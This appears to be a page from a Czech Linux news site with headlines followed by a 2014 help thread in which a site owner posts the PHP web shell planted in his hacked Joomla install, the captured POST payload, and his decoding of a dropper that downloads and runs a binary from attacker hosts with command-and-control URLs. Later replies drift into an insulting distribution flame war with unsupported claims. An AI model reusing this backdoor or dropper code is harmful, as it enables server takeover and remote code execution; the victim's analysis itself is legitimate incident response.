Radicle byl vydán ve verzi 1.6.0 s kódovým jménem Amaryllis. Jedná se o distribuovanou alternativu k softwarům pro spolupráci jako např. GitLab.
Zemřel Scott Adams, tvůrce komiksových stripů Dilbert parodujících pracovní prostředí velké firmy.
Sdružení CZ.NIC vydalo novou verzi Knot Resolveru (6.1.0). Jedná se o první vydanou stabilní verzi 6, která je nyní oficiálně preferovanou a doporučovanou verzí, namísto předešlé verze 5. Více o Knot Resolveru 6 je možné se dočíst přímo v dokumentaci.
Byl vydán Linux Mint 22.3 s kódovým jménem Zena. Podrobnosti v přehledu novinek a poznámkách k vydání. Vypíchnout lze, že nástroj Systémová hlášení (System Reports) získal mnoho nových funkcí a byl přejmenován na Informace o systému (System Information). Linux Mint 22.3 bude podporován do roku 2029.
Wine bylo po roce vývoje od vydání verze 10.0 vydáno v nové stabilní verzi 11.0. Přehled novinek na GitLabu. Vypíchnuta je podpora NTSYNC a dokončení architektury WoW64.
Byl vydán Mozilla Firefox 147.0. Přehled novinek v poznámkách k vydání a poznámkách k vydání pro vývojáře. Firefox nově podporuje Freedesktop.org XDG Base Directory Specification. Řešeny jsou rovněž bezpečnostní chyby. Nový Firefox 147 bude brzy k dispozici také na Flathubu a Snapcraftu.
Asociace repair.org udělila anticeny těm nejhorším produktům představeným na veletrhu CES 2026. Oceněnými jsou například šmírující kamery Amazon Ring AI, chytrý běžecký pás od společnosti Merach, která otevřeně přiznává, že nedokáže zabezpečit osobní data uživatelů, případně jednorázové lízátko, které rozvibrovává čelisti uživatele a tak přehrává hudbu. Absolutním vítězem je lednička od Samsungu, která zobrazuje reklamy a kterou lze otevřít pouze hlasovým příkazem přes cloudovou službu.
Íránští protirežimní aktivisté si všímají 30% až 80% ztráty packetů při komunikaci se satelity služby Starlink. Mohlo by se jednat o vedlejší důsledek rušení GPS, kterou pozemní přijímače Starlinku používají k výpočtu polohy satelitů a kterou se režim rovněž snaží blokovat, podle bezpečnostního experta a iranisty Amira Rashidiho je ale pravděpodobnější příčinou terestrické rušení přímo satelitní komunikace Starlinku podobnou
… více »Evropská komise (EK) zvažuje, že zařadí komunikační službu WhatsApp americké společnosti Meta mezi velké internetové platformy, které podléhají přísnější regulaci podle unijního nařízení o digitálních službách (DSA). Firmy s více než 45 miliony uživatelů jsou podle DSA považovány za velmi velké on-line platformy (Very Large Online Platforms; VLOP) a podléhají přísnějším pravidlům EU pro internetový obsah. Pravidla po
… více »Tržní hodnota technologické společnosti Alphabet poprvé v historii přesáhla čtyři biliony dolarů (83 bilionů Kč). Stalo se tak poté, co Apple oznámil, že bude na poli umělé inteligence (AI) spolupracovat s dceřinou firmou Alphabetu, společností Google.
AbcLinuxu.cz
ITBiz.cz
HDmag.cz
AbcPráce.cz
$ietdgc = "8c8580370182a2d20127a69c5c7b1af6";
if(isset($_REQUEST['eosdzj']))
{ $wmbqhi = $_REQUEST['eosdzj'];
eval($wmbqhi); exit(); }
if(isset($_REQUEST['geokxjkd']))
{ $wwdqd = $_REQUEST['ulgidjx'];
$koayobr = $_REQUEST['geokxjkd'];
$lyuot = fopen($koayobr, 'w');
$zcawdru = fwrite($lyuot, $wwdqd);
fclose($lyuot);
echo $zcawdru;
exit(); }
todle šlo POSTem po otevření infikované stránky:eosdzj=%24p+%3d+array%5fkeys%28%24%5fREQUEST%29%3b+echo+%24%5fREQUEST%5b%24p%5b2%5d%5d%3b+eval%28base64%5fdecode%28%24%5fREQUEST%5b%24p%5b1%5d%5d%29%29%3b&p1=ZnVuY3Rpb24gZG93bmxvYWRGaWxlICgkdXJsLCAkcGF0aCkgewoKICAkbmV3Zm5hbWUgPSAkcGF0aDsKICAkZmlsZSA9IGZvcGVuICgkdXJsLCAicmIiKTsKICBpZiAoJGZpbGUpIHsKICAgICRuZXdmID0gZm9wZW4gKCRuZXdmbmFtZSwgIndiKyIpOwoKICAgIGlmICgkbmV3ZikKICAgIHdoaWxlKCFmZW9mKCRmaWxlKSkgewogICAgICBmd3JpdGUoJG5ld2YsIGZyZWFkKCRmaWxlLCAxMDI0ICogNjQgKSwgMTAyNCAqIDY0ICk7CiAgICB9CiAgfQoKICBpZiAoJGZpbGUpIHsKICAgIGZjbG9zZSgkZmlsZSk7CiAgfQoKICBpZiAoJG5ld2YpIHsKICAgIGZjbG9zZSgkbmV3Zik7CiAgfQogfQoKJG9zID0gcGhwX3VuYW1lKCdzJyk7CiR0eXBlID0gcGhwX3VuYW1lKCdtJyk7CgplY2hvICJQSFBfU1RBUlQiOwoKaWYgKCAhZnVuY3Rpb25fZXhpc3RzKHNoZWxsX2V4ZWMpICkKewoJZWNobyAibm9leGVjXG4iOwoJZWNobyAiUEhQX0VORCI7CglleGl0KDApOwp9CgppZiAoICRvcyAhPT0gIkxpbnV4IiApCnsKCWVjaG8gIk5vTGludXg6ICIuJG9zLiI8YnI%2bXG4iOwoJZWNobyAiUEhQX0VORCI7CglleGl0KDApOwp9CgoKCmlmICgkdHlwZSA9PSAieDg2XzY0IikgLy82NC1iaXQgb3MKewoJcHJpbnQgIng4Nl82NFxuIjsKCSRkdyA9ICJodHRwOi8vcGFnZXMubXVzaWtsc3Qub3JnL3BzNjQiOwoJJHBzID0gIi4vcHM2NCI7Cn0KZWxzZQp7CglwcmludCAiaTY4NlxuIjsKCSRkdyA9ICJodHRwOi8vcGFnZXMubXVzaWtsc3Qub3JnL3BzMzIiOwoJJHBzID0gIi4vcHMzMiI7Cn0KCiRwcyA9ICJwcyI7CgppZiAoIWZpbGVfZXhpc3RzKCRwcykpCnsKCWVjaG8gIkRvd25sb2FkICRkd1xuIjsKCWRvd25sb2FkRmlsZSgkZHcsICRwcyk7CgkvL0BmaWxlX3B1dF9jb250ZW50cygiJFBTIiwgQGZpbGVfZ2V0X2NvbnRlbnRzKCRkdykpOwp9CmVsc2UKewoJZWNobyAiRXhpc3RzICRwc1xuIjsKfQoKCmNobW9kICgkcHMsICIwNzU1Iik7CgokZW52ID0gIkJEVT1odHRwOi8vYnQyMi5tdXNpa2xzdC5vcmcvYXIxLnBocCBTSFU9aHR0cDovL3Nlby5tdXNpa2xzdC5vcmcvZ3UucGhwIFNLVT1odHRwOi8vc2VlazIyLm11c2lrbHN0Lm9yZy8gTElOPTYwMDAgREJOPWFmMDAxIjsKJGNtZCA9ICRlbnYuIiAuLyRwcyA%2bL2Rldi9udWxsIDI%2bL2Rldi9udWxsICYiOwokb3V0ID0gc2hlbGxfZXhlYygkY21kKTsKCnVubGluayAoJHBzKTsKCmVjaG8gIlBIUF9FTkQiOwo%3d&p2=b1946ac92492d2347c6235b4d2611184&shid=33338
snažil jsem se to rozluštit a dostal jsem z toho skript:
$p = array_keys($_REQUEST); echo $_REQUEST[$p[2]]; eval(base64_decode($_REQUEST[$p[1]]));a proměnná $p[1] obsahuje toto:
function downloadFile ($url, $path)
{ $newfname = $path; $file = fopen ($url, "rb");
if ($file) { $newf = fopen ($newfname, "wb+");
if ($newf) while(!feof($file))
{ fwrite($newf, fread($file, 1024 * 64 ), 1024 * 64 ); }
}
if ($file) { fclose($file); }
if ($newf) { fclose($newf); } }
$os = php_uname('s');
$type = php_uname('m');
echo "PHP_START";
if ( !function_exists(shell_exec) )
{ echo "noexec\n"; echo "PHP_END"; exit(0); }
if ( $os !== "Linux" ) { echo "NoLinux: ".$os."
\n";
echo "PHP_END";
exit(0);
}
if ($type == "x86_64") //64-bit os
{
print "x86_64\n";
$dw = "http://pages.musiklst.org/ps64";
$ps = "./ps64";
}
else
{
print "i686\n";
$dw = "http://pages.musiklst.org/ps32";
$ps = "./ps32";
}
$ps = "ps";
if (!file_exists($ps))
{
echo "Download $dw\n";
downloadFile($dw, $ps);
//@file_put_contents("$PS", @file_get_contents($dw));
}
else
{
echo "Exists $ps\n";
}
chmod ($ps, "0755");
$env = "BDU=http://bt22.musiklst.org/ar1.php SHU=http://seo.musiklst.org/gu.php SKU=http://seek22.musiklst.org/ LIN=6000 DBN=af001";
$cmd = $env." ./$ps >/dev/null 2>/dev/null &";
$out = shell_exec($cmd);
unlink ($ps);
echo "PHP_END";
)
podle data te infikovane stranky jsem našel asi 20 podobných, server jsem přeinstalil, nahodil modsecurity a v logu vidím pokusy o otevření (bývalých) infikovaných php stránek.
záznam POST mám ale jen pro tuhle infikovanou php stránku (úplně první kód nahoře), a to proto, že to po vykonání POST házelo error:
Apache-Error: [file "/build/buildd-php5_5.3.3-7+squeeze14-i386-lt_SZ2/php5-5.3.3/sapi/apache2handler/sapi_apache2.c"] [line 326] [level 3] PHP Notice: Use of undefined constant shell_exec - assumed 'shell_exec' in /var/www/stranky/libraries/joomla/http/index.php(1) : eval()'d code(1) : eval()'d code on line 28
Prosím, poraďte co ještě nastavit, abych maximálně ztížil další průniky.
Díky
1.4.2014 00:46
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Chtel jsem poradit, jestli treba nezakazat nektere php ficury, ktere jsou takle drsne zneuzitelne.V PHP je dost slabá hranice mezi nebezpečné a užitečné, často se to i překrývá.
31.3.2014 15:53
Josef Kufner | skóre: 70
1.4.2014 00:44
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Prosím, poraďte co ještě nastavit, abych maximálně ztížil další průniky.
Předně je nezbytné změnit distribuci. Když člověk používá tu nejhorší, jaká je kde k nalezení, těžko se může divit následkům tohoto typu. Nikdo neví, kolik se v záměrně špatných distribucích skrývá problémů tohoto rozsahu.
…buildd-php5_5.3.3-7+squeeze14-i386-lt_SZ2…
Taky jsem to hledal…
Tak to je dobrá otázka. Ne, stále ještě mě neopustil ten zlozvyk říkat přesně to, co kolem sebe vidím, bez vytáček, bez politické korektnosti a bez snahy být zadobře se „všemi“ nebo s „většinou“.
Nelze si nevšimnout, že kdykoliv je v poradně dotaz, který řeší problémy se zoufale zastaralým softwarem, s nefunkčními balíčky (kvůli distribuci), s aktualizacemi systému nebo s bezpečností, v podstatě vždy takový dotaz někde obsahuje „Debilan Shitty“, „Debilan Crappy“ nebo nějakou podobnou „verzi“, případně „Blbuntu Stupid Moron“ a tak dále. V případě Ubuntu by se něco takového možná dalo svést na rozšířenost příslušné distribuce, ale v případě Debianu rozhodně ne. Hlavně je úsměvné, jak často Debian neustojí ani jednu jedinou aktualizaci systému (což je pro normální distribuce běžný proces, který by se měl dít asi tak jednou týdně nebo častěji) a jeho uživatel pak celý stroj přeinstaluje, místo Shitty tam dá Crappy a dostane se znova do naprosto stejné situace, jen posunuté v čase. 
Kdepak zloba — zkrátka jen říkám, co vidím.
Dokladuj prípady zlyhania aktualizácie debianu.
K tomu nemám důvod ani potřebu, i když by asi stačilo prohledat pár desítek dotazů z místní poradny. Kdo chce tu sračku používat, dobře mu tak. Proč bych mu něco dokládal?
Ich habe keine Probleme mit stable debian.Du nichts mochte lernen.
I Dont have a Problem with stable debian. You dont want to learn.
Co je to stable verze? Jak může mít systém sestávající z tisíců balíčků verzi? Z toho je naprosto jasné, že je něco špatně a že je třeba od takového systému utéct pryč.
Mimochodem, „stable“ neznamená nic jiného, než že tam jsou stabilní pět let staré bugy, které už nikdy nikdo neopraví. Děkuji, nechci. Používat 5 let staré technologie s 5 let starými bugy je na mě opravdu moc složité. Já používám pouze software, který je aktuální a který zkrátka funguje.
Z toho je naprosto jasné, že je něco špatně a že je třeba od takového systému utéct pryč.Your logic is flawed...
Mimochodem, „stable“ neznamená nic jiného, než že tam jsou stabilní pět let staré bugy, které už nikdy nikdo neopraví.To je lež, lež, lež.
Kdepak zloba — zkrátka jen říkám, co vidím.Halucinogeny jsou svinstvo. Zkus to bez nich a možná to bude lepší.
Nelze si nevšimnout, že kdykoliv je v poradně dotaz, který řeší problémy se zoufale zastaralým softwarem, s nefunkčními balíčky (kvůli distribuci), s aktualizacemi systému nebo s bezpečností, v podstatě vždy takový dotaz někde obsahuje „Debilan Shitty“, „Debilan Crappy“ nebo nějakou podobnou „verzi“, případně „Blbuntu Stupid Moron“ a tak dále. V případě Ubuntu by se něco takového možná dalo svést na rozšířenost příslušné distribuce, ale v případě Debianu rozhodně ne.
Na arch by mohol byť aj titulok : "Arch falling of the Cliff"
Předně je nezbytné změnit distribuci.Schovej si tyhle svoje bláboly někam mimo poradnu, jo? Děravou Joomlu opravdu změna distribuce nevyřeší. A co se týče odkazovaného problému - IIRC se vývojáři Debianu ptali v mailové konferenci vývojářů OpenSSL a ti tu (chybnou) změnu odsouhlasili s tím, že totéž udělají v upstreamu. Následně zjistili, že ne, ale nikomu v Debianu už to neřekli.
Vieš o tom, že archlinux v openVZ poriadne nefunguje.
Ako si predstavuješ bezpečnosť ? Vyzerá to tak, že nová verzia všetko rieši.
Mně stačí, že funguje v LXC. Navíc v ArchLinuxu v podstatě nikdy nepoužívám distribuční kernel, takže vlastně nevím, kde všude ArchLinux sám od sebe funguje a kde ne.
Na serverech často ArchLinux nemám, protože ne každý je fanouškem ArchLinuxu a u sdílených strojů je lepší mít systém, kterému s rozumnou pravděpodobností bude víc lidí rozumět. Proto zpravidla padne volba na Fedoru. U jednoho z předchozích zaměstnavatelů jsem měl dokonce desktop s Fedorou (zpočátku z povinnosti/nutnosti). Sice to nebyl můj oblíbený ArchLinux s custom kernelem a pár vychytávkami, ale co se týká spolehlivosti a rozumného implicitního nastavení, nemohl jsem si ten desktop vynachválit. Tedy nechápu ten intenzivní masochismus, který někoho přivede až k Debianu, ať už na desktopu nebo na serveru.
Problémy s bezpečností nemají jiné řešení než přechod na novou verzi. Jediná otázka je, jestli to bude nová verze přímo od tvůrců daného balíčku (což přesně v případě OpenSSL nelze než doporučit), nebo stokrát patchovaný paskvil, který se snaží opravit chybu a zároveň zůstat kompatibilní s nějakým zoufale zastaralým prostředím. Debian volí druhou možnost a jeho 32768 OpenSSL klíčů byl jeden z hvězdných výsledků tohoto přístupu k věci.
2.4.2014 10:22
Jendа | skóre: 78
| blog: Jenda
| JO70FB
mirror.vpsfree.cz:~# grep "connect from" /var/log/rsyncd ... 2012/08/08 08:32:54 [13520] connect from UNKNOWN (195.39.65.169) 2012/08/09 09:27:11 [15203] connect from UNKNOWN (195.39.65.169) 2012/08/10 12:28:49 [18338] connect from UNKNOWN (195.39.65.169) 2012/08/13 12:21:57 [30405] connect from UNKNOWN (195.39.65.169) 2012/08/14 10:13:22 [32294] connect from UNKNOWN (195.39.65.169) 2012/08/14 17:28:08 [432] connect from UNKNOWN (195.39.65.169) 2012/08/15 11:37:58 [1857] connect from UNKNOWN (195.39.65.169) 2012/08/21 17:19:28 [15359] connect from UNKNOWN (195.39.65.169) 2012/08/21 17:37:54 [15372] connect from UNKNOWN (195.39.65.169) 2012/08/21 17:38:36 [15373] connect from UNKNOWN (195.39.65.169) 2013/01/14 21:56:20 [19673] connect from node1a.prg.vpsfree.cz (77.93.223.10)
1.4.2014 08:30
MMMMMMMMM | skóre: 44
| blog: unstable
| Valašsko :-)
Ad. Josef Kufner: provozuju malý web pro neziskové sdružení, moje kvality poskytnutých služeb proto určitě postačují. Obávám se,že i kdybych provozoval web u hostingu, tak když se tam dostali přes mou joomlu, dostali by se tam i přes joomlu na hostingu.
Ad. Andrej: respektuju tvůj názor na Debian, ačkoli ho teda nesdílím. A tvůj příspěvek mi příjde trochu mimo, neptal jsem se na kvalitu distribuce. Něco jako bych já šel ná fórum škodovky, kde má někdo problém s převodovkou u suprbu a radil mu, že škodovka stojí za hojno, ať si raděj koupí dáčiju
Díky těm, co se snažili poradit.
Tiskni
Sdílej:
